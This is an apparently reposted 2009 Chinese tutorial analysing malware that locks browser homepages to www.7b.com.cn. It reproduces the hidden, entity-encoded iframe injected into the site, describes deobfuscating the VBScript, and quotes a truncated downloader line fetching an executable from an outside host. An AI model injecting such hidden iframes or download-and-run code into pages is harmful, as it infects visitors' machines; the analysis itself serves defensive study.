当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 黑客是如何做到锁定用户的浏览器首页

安全基础
可以用于交换环境下SNIFFER的几种攻击技术手段
嗅探的时候,防火墙能发现吗?
wincap and sniffer(1)
wincap and sniffer(2)
客户端登录到Win 2000域
网络故障问答集萃
软件开发项目控制浅谈(1)
软件开发项目控制浅谈(2)
软件开发项目控制浅谈(3)
软件开发项目控制浅谈(4)
用Telnet快速收发电子邮件(1)
用Telnet快速收发电子邮件(2)
Windows XP系统启动提速专题
让Google长个好“记性”
恢复EXE文件关联补完版
真真假假的安全警告
网络安全应急三观
全力打造个人网络安全
系统自动启动程序之十大藏身之所
访问权限问题问答集锦

安全基础 中的 黑客是如何做到锁定用户的浏览器首页


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-19   浏览: 117 ::
收藏到网摘: n/a

  前不久,很多网友都感染了www.7b.com.cn的病毒,首页被改成这个网站,并且无法改回。黑客是如何做到锁定用户的浏览器首页呢?下面我们就去探个究竟。

 

  提醒:分析病毒存在一定风险,建议在虚拟机下操作。

  第一步 查看www.7b.com.cn首页的源代码,可以发现在尾部有如下的字样:

  <iframe src=&#104&#116&#116&#112&#58&#47&#47&#109&#46&#100&#97&#115&#104&#111&#119&#46&#99&#111&#109&#46&#99&#110&#47&#109&#46&#104&#116&#109&#108 width=0 height=0></iframe>

  这是一个嵌入到7b网址之家首页的页面,即打开www.7b.com.cn也就同时打开了这个页面。

  而“&#104&#116&#116&#112&#58&#47&#47&#109&#46&#100&#97&#115&#104&#111&#119&#46&#99&#111&#109&#46&#99&#110&#47&#109&#46&#104&#116&#109&#108”表示的是一个字符串,“&#”后面是每个字符串ASCII的十进制值。

  直接把这段乱码保存为HTM文件,用IE打开,就可以看到它的真实面目“http://m.dashow.com.cn/m.html”。

  第二步 查看http://m.dashow.com.cn/m.html的源代码,把看的<scrtipt>脚本段中的Execute替换为Document.Write,然后打开这个HTM页面,就会出现一段代码,同样地,把EXECUTE换成我们无敌的Document.Write,前后加脚本标记,存HTM打开。屏幕上立即出现了一段令人眼花的东西。把眼花缭乱的东西整理一下,并将出现的CHR()在前面用到过,作用是把字符的ASCII转成字符,只不过这次是16进制。然后再将字符拼接成字符串,然后再Execute运行这个命令字符串。继续用Document.Write替换掉EXECUTE,前后加脚本标记,存HTM打开。

  第三步 经过上几步的还原后终于看到了这个恶意页面的最终面目。

  on error resume next curl = "http://m.dashow.com.cn/start.exe"……其后省略。

  这段代码中我们可以很清楚地看到http://m.dashow.com.cn/start.exe这个链接。没错,它就是运行后可以将用户主页锁定为www.7b.com.cn的病毒。

  可以用下载工具将这个文件下载下来,如果你的杀毒软件查不到的话最好立即上报。这样可以保证杀毒软件快速查杀这个病毒,并使更少的网友免受该病毒的侵害。